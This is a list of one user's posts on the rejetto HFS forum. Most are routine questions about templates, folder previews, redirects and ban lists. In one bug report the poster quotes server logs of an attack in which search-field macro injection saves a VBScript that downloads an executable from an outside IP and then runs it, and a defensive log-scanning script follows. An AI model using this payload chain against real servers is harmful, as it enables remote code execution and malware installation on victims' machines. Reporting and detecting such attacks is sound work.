rejetto forum

Show Posts


Topics - D

Pages: 1
1
I am using a script for displaying folder previews
Code: [Select]
{. if|{. exists|%item-folder%{.decodeuri|%item-url%.}.jpg .}| <img src="%item-url%.jpg" /> |  .}
It doesn't work for some folders using Cyrillic names. What can I do about it?

2
Bug reports / A question about HFS v2.3m vulnerability
« on: July 25, 2023, 05:00:40 AM »
https://www.cvedetails.com/cve/CVE-2020-13432/

Quote
rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual files or folders are used, allows remote attackers to trigger an invalid-pointer write access violation via concurrent HTTP requests with a long URI or long HTTP headers.

Confidentiality Impact: None (There is no impact to the confidentiality of the system.)
Integrity Impact: None (There is no impact to the integrity of the system)
Availability Impact: Partial (There is reduced performance or interruptions in resource availability.)
Access Complexity: Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit.)
Authentication: Not required (Authentication is not required to exploit the vulnerability.)
If I read it correctly, this is a DoS solution that can't deal real damage, such as remote code execution?

Which HFS version is more secure (2.3m / 2.4 / 3.0)? Logically, not the beta versions, but they may have some vulnerabilities patched, I guess.

3
HFS ~ HTTP File Server / How can I set up a simple redirect?
« on: March 23, 2022, 10:36:58 AM »
www.example.com/123/321.jpg
should be redirected to
www.example.com/000/321.jpg
and same with all files in /123/

is this possible?

4
HFS ~ HTTP File Server / Request login/password but accept any
« on: December 17, 2021, 12:11:13 PM »
Is this possible? I found option "accept any login for unprotected resources" but can't get it to work.

5
Bug reports / Possible vulnerability
« on: December 11, 2021, 04:34:32 AM »
Since yesterday, someone is trying to pull code injection on me  :(  I'm on 2.3m
I'm not sure if I got hacked, I found no such files and my AV only quarantined the logs (scanned the link perhaps)
Is there a way to disable /?search functionality completely? I'm not using it anyway
Code: [Select]
10.12.2021 6:55:41 36.46.149.98 53274 Requested GET /?search= {.exec|C:\Users\Public\1.exe.}
10.12.2021 6:55:45 36.46.149.98 53556 Requested GET /?search= {.exec|C:\Users\Public\1.exe.}
10.12.2021 7:01:28 36.46.149.98 57608 Requested GET /
10.12.2021 7:01:28 36.46.149.98 57640 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://103.144.2.108:8888/1.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\1.exe", 2 '//overwrite
> end with.}
Code: [Select]
10.12.2021 6:55:36 36.46.149.98 52884 Requested GET /
10.12.2021 6:55:37 36.46.149.98 52917 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://103.144.2.108:8888/1.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\1.exe", 2 '//overwrite
> end with.}
Code: [Select]
11.12.2021 8:08:23 180.76.141.125 55846 Requested GET /
11.12.2021 8:08:24 180.76.141.125 55874 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://103.144.2.108:8888/skol.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\skol.exe", 2 '//overwrite
> end with.}
11.12.2021 8:08:29 180.76.141.125 56070 Requested GET /?search= {.exec|C:\Users\Public\skol.exe.}
11.12.2021 8:08:32 180.76.141.125 56194 Requested GET /?search= {.exec|C:\Users\Public\skol.exe.}
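
A way to triage log excerpts like the ones above, as an added example that is not part of the original post or of HFS: a Python scan that flags requests carrying HFS macro syntax (`{.name|`) and groups them by source address. The log layout is inferred from the excerpts above; the sample lines and addresses are constructed, and the handling of percent-encoded targets is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample in the log layout shown in the post (date, time, IP, port,
# "Requested", method, target). Addresses are documentation-range placeholders.
SAMPLE_LOG = r"""10.12.2021 6:55:36 192.0.2.10 52884 Requested GET /
10.12.2021 6:55:37 192.0.2.10 52917 Requested GET /?search= {.save|C:\Users\Public\script.vbs|dim xHttp
> xHttp.Send.}
10.12.2021 6:55:41 192.0.2.10 53274 Requested GET /?search=%7B.exec%7CC:\Users\Public\1.exe.%7D
10.12.2021 7:02:00 198.51.100.7 40000 Requested GET /?search=holiday
10.12.2021 7:02:05 198.51.100.7 40001 Requested GET /photos/p.jpg
"""

ENTRY = re.compile(r"^(\d{1,2}\.\d{1,2}\.\d{4} \d{1,2}:\d{2}:\d{2}) (\S+) (\d+) Requested (\S+) (.*)$")
MACRO = re.compile(r"\{\.\s*([A-Za-z_]+)")  # opening of an HFS macro: {.name|...

def parse_entries(text):
    """Yield (timestamp, ip, method, target); lines without a timestamp are
    continuations of a multi-line request and are appended to the previous entry."""
    current = None
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            if current:
                yield tuple(current)
            current = [m.group(1), m.group(2), m.group(4), m.group(5)]
        elif current:
            current[3] += "\n" + line.lstrip("> ")
    if current:
        yield tuple(current)

def find_macro_requests(text):
    """Return {ip: [(timestamp, macro_names), ...]} for requests carrying macro syntax."""
    hits = defaultdict(list)
    for ts, ip, _method, target in parse_entries(text):
        decoded = unquote(target)  # assumption: macros may arrive percent-encoded
        names = sorted({n.lower() for n in MACRO.findall(decoded)})
        if names:
            hits[ip].append((ts, names))
    return dict(hits)

if __name__ == "__main__":
    for ip, events in find_macro_requests(SAMPLE_LOG).items():
        for ts, names in events:
            print(f"{ts}  {ip}  macro(s) in request: {', '.join(names)}")
```

A `save` hit followed by an `exec` hit from the same address is the sequence seen in the excerpts above, so the paths named in those requests are the first places to check on disk.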

6
Bug reports / False errors on upload
« on: September 16, 2021, 10:54:00 PM »
They only appear in logs. I'm using HFS 2.3m

Code: [Select]
Upload failed for 20210916_221111.jpg: Not allowed.
Upload failed 20210916_221111.jpg
Upload failed for 20210916_221155.jpg: Not allowed.
Upload failed 20210916_221155.jpg
Upload failed for 20210916_221259.jpg: Not allowed.
Upload failed 20210916_221259.jpg
Requested POST /
Uploading 20210916_221111.jpg
Fully uploaded 20210916_221111.jpg - 71.2 K @ 316.4 KB/s
Uploading 20210916_221155.jpg
Fully uploaded 20210916_221155.jpg - 114.0 K @ 797.2 KB/s
Uploading 20210916_221259.jpg
Fully uploaded 20210916_221259.jpg - 163.8 K @ 1.1 MB/s

7
HTML & templates / Custom folder previews
« on: September 11, 2021, 09:36:48 PM »
Let's say I have the following folders:

New folder
New folder 2
New folder 3

Each contains a "p.jpg"; I want to use these as folder previews.

The code for diff template I'm currently using:
Code: [Select]
[+]
<script>
// One row per entry in the file list table
var list=document.querySelectorAll("table#files>tbody>tr");
function changepic(a1)
{
  var alink=a1.querySelector("a");
  var adress=alink.getAttribute("href");
  // Folder links end with "/"; request p.jpg inside each folder
  if(adress.endsWith("/"))
  {
    adress+="p.jpg";
    var img=document.createElement("img");
    img.setAttribute("src",adress);
    // Hide the image if p.jpg does not exist in the folder
    img.setAttribute("onerror","this.style.display='none'");
    a1.children[3].appendChild(img);
  }
}
list.forEach(changepic);
</script>
eats too much CPU if there are too many folders, because the script doesn't check if p.jpg is actually present in the folder.

How can I fix it? Thanks in advance.

8
HFS ~ HTTP File Server / Is there a way to add login message?
« on: May 28, 2021, 02:14:30 AM »
Like in attachment.

9
HTML & templates / How can I implement thing on image attached?
« on: March 15, 2021, 02:28:24 AM »
I need folder names to have an additional link attached automatically, with part of the folder name in it:

Folder "A - B C 3" [link to example.site/view-2.php?name=A]
or
Folder "A - B C 3" [link to example.site/view-2.php?name=A: B C III]

1. How can I use foldername as variable?
2. How can I edit that variable? (%20- = %3A)
3. How can I add my link through diff template?

10
HFS ~ HTTP File Server / Is there a way to add multiple rows in banlist?
« on: February 25, 2021, 05:52:28 PM »
title
